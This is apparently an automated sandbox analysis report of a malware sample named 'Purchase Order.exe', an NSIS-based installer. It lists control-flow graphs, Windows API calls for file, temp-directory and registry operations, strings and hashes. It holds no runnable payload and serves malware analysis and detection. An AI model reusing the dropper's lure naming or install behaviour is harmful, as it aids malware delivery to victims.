                                                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                  • String ID: "C:\Users\user\Desktop\Purchase Order.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$Nonbeneficial Setup: Installing$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                  • API String ID: 1975747703-2204820880
                                                                                                  • Opcode ID: b5acaa8937ced472a66d3687a921226f39372a12dbbf564bd8eff0e0bc24d963
                                                                                                  • Instruction ID: 29345e8072be8e75dc90901d6125d60d13300850aec60374d900494af90ecb47
                                                                                                  • Opcode Fuzzy Hash: b5acaa8937ced472a66d3687a921226f39372a12dbbf564bd8eff0e0bc24d963
                                                                                                  • Instruction Fuzzy Hash: 8161A4B06442407ED620AF65AD45F373A6CEB8474AF40447FF945B22E2C6BCAD029A3D

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 356 402d4a-402d98 GetTickCount GetModuleFileNameA call 405b6a 359 402da4-402dd2 call 405ef7 call 4059b0 call 405ef7 GetFileSize 356->359 360 402d9a-402d9f 356->360 368 402ec2-402ed0 call 402cab 359->368 369 402dd8-402def 359->369 361 402fe9-402fed 360->361 375 402fa1-402fa6 368->375 376 402ed6-402ed9 368->376 371 402df1 369->371 372 402df3-402e00 call 403261 369->372 371->372 380 402e06-402e0c 372->380 381 402f5d-402f65 call 402cab 372->381 375->361 378 402f05-402f51 GlobalAlloc call 406373 call 405b99 CreateFileA 376->378 379 402edb-402ef3 call 403277 call 403261 376->379 406 402f53-402f58 378->406 407 402f67-402f97 call 403277 call 402ff0 378->407 379->375 404 402ef9-402eff 379->404 385 402e8c-402e90 380->385 386 402e0e-402e26 call 405b25 380->386 381->375 389 402e92-402e98 call 402cab 385->389 390 402e99-402e9f 385->390 386->390 403 402e28-402e2f 386->403 389->390 395 402ea1-402eaf call 406305 390->395 396 402eb2-402ebc 390->396 395->396 396->368 396->369 403->390 408 402e31-402e38 403->408 404->375 404->378 406->361 416 402f9c-402f9f 407->416 408->390 410 402e3a-402e41 408->410 410->390 411 402e43-402e4a 410->411 411->390 413 402e4c-402e6c 411->413 413->375 415 402e72-402e76 413->415 417 402e78-402e7c 415->417 418 402e7e-402e86 415->418 416->375 419 402fa8-402fb9 416->419 417->368 417->418 418->390 420 402e88-402e8a 418->420 421 402fc1-402fc6 419->421 422 402fbb 419->422 420->390 423 402fc7-402fcd 421->423 422->421 423->423 424 402fcf-402fe7 call 405b25 423->424 424->361
                                                                                                  APIs
                                                                                                  • GetTickCount.KERNEL32 ref: 00402D5E
                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Purchase Order.exe,00000400), ref: 00402D7A
                                                                                                    • Part of subcall function 00405B6A: GetFileAttributesA.KERNELBASE(00000003,00402D8D,C:\Users\user\Desktop\Purchase Order.exe,80000000,00000003), ref: 00405B6E
                                                                                                    • Part of subcall function 00405B6A: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B90
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order.exe,C:\Users\user\Desktop\Purchase Order.exe,80000000,00000003), ref: 00402DC3
                                                                                                  • GlobalAlloc.KERNELBASE(00000040,00409130), ref: 00402F0A
                                                                                                  Strings
                                                                                                  • Error launching installer, xrefs: 00402D9A
                                                                                                  • C:\Users\user\Desktop\Purchase Order.exe, xrefs: 00402D64, 00402D73, 00402D87, 00402DA4
                                                                                                  • C:\Users\user\Desktop, xrefs: 00402DA5, 00402DAA, 00402DB0
                                                                                                  • "C:\Users\user\Desktop\Purchase Order.exe", xrefs: 00402D4A
                                                                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402F53
                                                                                                  • Null, xrefs: 00402E43
                                                                                                  • soft, xrefs: 00402E3A
                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402D54, 00402F22
                                                                                                  • Inst, xrefs: 00402E31
                                                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402FA1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                  • String ID: "C:\Users\user\Desktop\Purchase Order.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Purchase Order.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                  • API String ID: 2803837635-1925302521
                                                                                                  • Opcode ID: e5ab56cf196d26c18991739aeee88d59d7819f5e2225516add2df55f48501880
                                                                                                  • Instruction ID: 1e54d23c6bd4663b885b54a46d63d50a2b02afe17d1d0705d7bda66adc4b1b0c
                                                                                                  • Opcode Fuzzy Hash: e5ab56cf196d26c18991739aeee88d59d7819f5e2225516add2df55f48501880
                                                                                                  • Instruction Fuzzy Hash: 6661E5B1A40215ABDF20AF64DE89A9E76B8EB04355F11413FF904B72C1C7BC9D418B9C

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 558 401759-40177c call 402ace call 4059d6 563 401786-401798 call 405ef7 call 405969 lstrcatA 558->563 564 40177e-401784 call 405ef7 558->564 569 40179d-4017a3 call 406162 563->569 564->569 574 4017a8-4017ac 569->574 575 4017ae-4017b8 call 4061fb 574->575 576 4017df-4017e2 574->576 583 4017ca-4017dc 575->583 584 4017ba-4017c8 CompareFileTime 575->584 578 4017e4-4017e5 call 405b45 576->578 579 4017ea-401806 call 405b6a 576->579 578->579 586 401808-40180b 579->586 587 40187e-4018a7 call 405110 call 402ff0 579->587 583->576 584->583 589 401860-40186a call 405110 586->589 590 40180d-40184f call 405ef7 * 2 call 405f19 call 405ef7 call 4056ed 586->590 600 4018a9-4018ad 587->600 601 4018af-4018bb SetFileTime 587->601 602 401873-401879 589->602 590->574 622 401855-401856 590->622 600->601 604 4018c1-4018cc CloseHandle 600->604 601->604 605 402967 602->605 607 4018d2-4018d5 604->607 608 40295e-402961 604->608 609 402969-40296d 605->609 611 4018d7-4018e8 call 405f19 lstrcatA 607->611 612 4018ea-4018ed call 405f19 607->612 608->605 618 4018f2-4022e2 call 4056ed 611->618 612->618 618->609 622->602 624 401858-401859 622->624 624->589
                                                                                                  APIs
                                                                                                  • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\professionalizing,00000000,00000000,00000031), ref: 00401798
                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\professionalizing,00000000,00000000,00000031), ref: 004017C2
                                                                                                    • Part of subcall function 00405EF7: lstrcpynA.KERNEL32(?,?,00000400,0040336D,00422F20,NSIS Error), ref: 00405F04
                                                                                                    • Part of subcall function 00405110: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000,?), ref: 00405149
                                                                                                    • Part of subcall function 00405110: lstrlenA.KERNEL32(00402D22,Skipped: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000), ref: 00405159
                                                                                                    • Part of subcall function 00405110: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll,00402D22,00402D22,Skipped: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll,00000000,00000000,00000000), ref: 0040516C
                                                                                                    • Part of subcall function 00405110: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll), ref: 0040517E
                                                                                                    • Part of subcall function 00405110: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A4
                                                                                                    • Part of subcall function 00405110: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051BE
                                                                                                    • Part of subcall function 00405110: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051CC
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                  • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\professionalizing$C:\Users\user\AppData\Local\Temp\nsj39BE.tmp$C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll$Call
                                                                                                  • API String ID: 1941528284-1572893336
                                                                                                  • Opcode ID: f1777878cc107186975007c34ec6e0b6c00b7ce99c1c8040aed14bca133d0caf
                                                                                                  • Instruction ID: 1ba5c428860e61568eef0a4ccac71dac967fbf7ecb8295bcfefdc03a30224d69
                                                                                                  • Opcode Fuzzy Hash: f1777878cc107186975007c34ec6e0b6c00b7ce99c1c8040aed14bca133d0caf
                                                                                                  • Instruction Fuzzy Hash: 2341F471A04515BACF107BB5DC45EAF3678EF41328B20823BF021B11E2DA3C8A419FAD

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 625 405110-405125 626 4051db-4051df 625->626 627 40512b-40513d 625->627 628 405148-405154 lstrlenA 627->628 629 40513f-405143 call 405f19 627->629 631 405171-405175 628->631 632 405156-405166 lstrlenA 628->632 629->628 634 405184-405188 631->634 635 405177-40517e SetWindowTextA 631->635 632->626 633 405168-40516c lstrcatA 632->633 633->631 636 40518a-4051cc SendMessageA * 3 634->636 637 4051ce-4051d0 634->637 635->634 636->637 637->626 638 4051d2-4051d5 637->638 638->626
                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000,?), ref: 00405149
                                                                                                  • lstrlenA.KERNEL32(00402D22,Skipped: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000), ref: 00405159
                                                                                                  • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll,00402D22,00402D22,Skipped: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll,00000000,00000000,00000000), ref: 0040516C
                                                                                                  • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll), ref: 0040517E
                                                                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A4
                                                                                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051BE
                                                                                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 004051CC
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                  • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll
                                                                                                  • API String ID: 2531174081-3958864140
                                                                                                  • Opcode ID: 1646e66f1100ef219ca1350417871fd30607a5d42d26b8f3d60eba681ba6f46d
                                                                                                  • Instruction ID: 38fa31381a166635c2069e030e34d3db0945d62c2eda65f80c6bd2e149c96a35
                                                                                                  • Opcode Fuzzy Hash: 1646e66f1100ef219ca1350417871fd30607a5d42d26b8f3d60eba681ba6f46d
                                                                                                  • Instruction Fuzzy Hash: FD215C71E00518BBDF119FA5CD80ADFBFB9EB04354F14807AF904AA291C7799A41CFA8

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 639 4055d6-405621 CreateDirectoryA 640 405623-405625 639->640 641 405627-405634 GetLastError 639->641 642 40564e-405650 640->642 641->642 643 405636-40564a SetFileSecurityA 641->643 643->640 644 40564c GetLastError 643->644 644->642
                                                                                                  APIs
                                                                                                  • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405619
                                                                                                  • GetLastError.KERNEL32 ref: 0040562D
                                                                                                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405642
                                                                                                  • GetLastError.KERNEL32 ref: 0040564C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                                                                                  • API String ID: 3449924974-891493705
                                                                                                  • Opcode ID: f10b22bb5142ab39e3e91bc7df170e02474760785f1b3b99a39c7e09e389b4b4
                                                                                                  • Instruction ID: f6395dc840433d181f75b3fc8fae80690a43e09e82cbb082af9cf45b84ce1534
                                                                                                  • Opcode Fuzzy Hash: f10b22bb5142ab39e3e91bc7df170e02474760785f1b3b99a39c7e09e389b4b4
                                                                                                  • Instruction Fuzzy Hash: 82010871D04259EAEF119FA0DC44BEFBFB8EB14314F008576D908B6280D779A604CFAA

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 645 406222-406242 GetSystemDirectoryA 646 406244 645->646 647 406246-406248 645->647 646->647 648 406258-40625a 647->648 649 40624a-406252 647->649 651 40625b-40628d wsprintfA LoadLibraryExA 648->651 649->648 650 406254-406256 649->650 650->651
                                                                                                  APIs
                                                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406239
                                                                                                  • wsprintfA.USER32 ref: 00406272
                                                                                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406286
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                  • String ID: %s%s.dll$UXTHEME$\
                                                                                                  • API String ID: 2200240437-4240819195
                                                                                                  • Opcode ID: c7ba92785c192ffb77ecdfb90d0fa47c7b7783556fece6129122b9a6395f8fae
                                                                                                  • Instruction ID: 4eb1d724573375327ef03b870ab6fb06d37159ba94d5fa14c1e1425601a81350
                                                                                                  • Opcode Fuzzy Hash: c7ba92785c192ffb77ecdfb90d0fa47c7b7783556fece6129122b9a6395f8fae
                                                                                                  • Instruction Fuzzy Hash: A2F0FC3090011AA7DB24B768DC0DFEB365CAB08305F1401BAA546E11D1D578F9258B69

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 652 4023d3-402419 call 402bc3 call 402ace * 2 RegCreateKeyExA 659 40295e-40296d 652->659 660 40241f-402427 652->660 661 402437-40243a 660->661 662 402429-402436 call 402ace lstrlenA 660->662 666 40243c-40244d call 402aac 661->666 667 40244e-402451 661->667 662->661 666->667 670 402462-402476 RegSetValueExA 667->670 671 402453-40245d call 402ff0 667->671 673 402478 670->673 674 40247b-402555 RegCloseKey 670->674 671->670 673->674 674->659 677 402729-402730 674->677 677->659
                                                                                                  APIs
                                                                                                  • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402411
                                                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj39BE.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402431
                                                                                                  • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsj39BE.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040246E
                                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsj39BE.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040254F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseCreateValuelstrlen
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp
                                                                                                  • API String ID: 1356686001-540378780
                                                                                                  • Opcode ID: 532cf4714589016526744554cc58b87e9890b833549d6e086e2f56b221f18e11
                                                                                                  • Instruction ID: 45e6817f5ac0ad5077c8573445b5e51b6f54d3a00a8772886ac111494e5e57ea
                                                                                                  • Opcode Fuzzy Hash: 532cf4714589016526744554cc58b87e9890b833549d6e086e2f56b221f18e11
                                                                                                  • Instruction Fuzzy Hash: B52181B1E00109BEEB10EFA4DE49EAF7BB8EB54358F20403AF505B61D1D6B95D019B28

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 678 405b99-405ba3 679 405ba4-405bcf GetTickCount GetTempFileNameA 678->679 680 405bd1-405bd3 679->680 681 405bde-405be0 679->681 680->679 682 405bd5 680->682 683 405bd8-405bdb 681->683 682->683
                                                                                                  APIs
                                                                                                  • GetTickCount.KERNEL32 ref: 00405BAD
                                                                                                  • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405BC7
                                                                                                  Strings
                                                                                                  • "C:\Users\user\Desktop\Purchase Order.exe", xrefs: 00405B99
                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B9C
                                                                                                  • nsa, xrefs: 00405BA4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CountFileNameTempTick
                                                                                                  • String ID: "C:\Users\user\Desktop\Purchase Order.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                  • API String ID: 1716503409-553797519
                                                                                                  • Opcode ID: fefc0482c854070ed442c91c2c9b831f833a608d20a08577fe9f9df7fb59a314
                                                                                                  • Instruction ID: bfd989d901498d13fd43eebbd57bf0dae5b4b0e38faf5f28c0e1a6b78de2ea97
                                                                                                  • Opcode Fuzzy Hash: fefc0482c854070ed442c91c2c9b831f833a608d20a08577fe9f9df7fb59a314
                                                                                                  • Instruction Fuzzy Hash: B7F082367086046BEB108F55EC04B9B7BACDF91750F10C03BFA08DA1D0E6B5F9548B59

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 684 402b0e-402b37 RegOpenKeyExA 685 402ba2-402ba6 684->685 686 402b39-402b44 684->686 687 402b5f-402b6f RegEnumKeyA 686->687 688 402b71-402b83 RegCloseKey call 406290 687->688 689 402b46-402b49 687->689 697 402b85-402b94 688->697 698 402ba9-402baf 688->698 691 402b96-402b99 RegCloseKey 689->691 692 402b4b-402b5d call 402b0e 689->692 694 402b9f-402ba1 691->694 692->687 692->688 694->685 697->685 698->694 699 402bb1-402bbf RegDeleteKeyA 698->699 699->694 701 402bc1 699->701 701->685
                                                                                                  APIs
                                                                                                  • RegOpenKeyExA.KERNELBASE(?,?,00000000,?,?), ref: 00402B2F
                                                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B6B
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402B74
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402B99
                                                                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402BB7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Close$DeleteEnumOpen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1912718029-0
                                                                                                  • Opcode ID: 1b6bc3f1deefa661c1c70c6fa14cacfade3144c59ce8f26d4f2651a72c65fdc8
                                                                                                  • Instruction ID: cbb66f3b7e8ae2888f759c75a40f8dd5de3b5766fb854263a8955dc236021e84
